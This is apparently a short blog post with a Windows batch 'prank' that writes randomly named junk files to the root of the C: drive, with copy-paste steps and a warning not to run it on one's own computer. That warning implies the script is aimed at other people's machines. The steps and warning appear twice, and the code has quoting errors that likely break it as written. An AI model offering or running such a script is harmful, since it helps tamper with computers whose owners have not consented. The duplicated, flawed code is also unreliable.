Method :
1. Open Notepad
2. Copy the code given below
3. Save as "Anything.bat"
Warning :
Do not try this on your own computer. I will not be responsible for any damages caused to your computer.
1. Open Notepad
2. Copy the code given below
Code:
@ echo off
rem ---------------------------------
rem Spam Local Disk
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
echo %random% > 'C:\%random%.txt'
3. Save as "Anything.bat"
Warning :
Do not try this on your own computer. I will not be responsible for any damages caused to your computer.
0 comments:
Post a Comment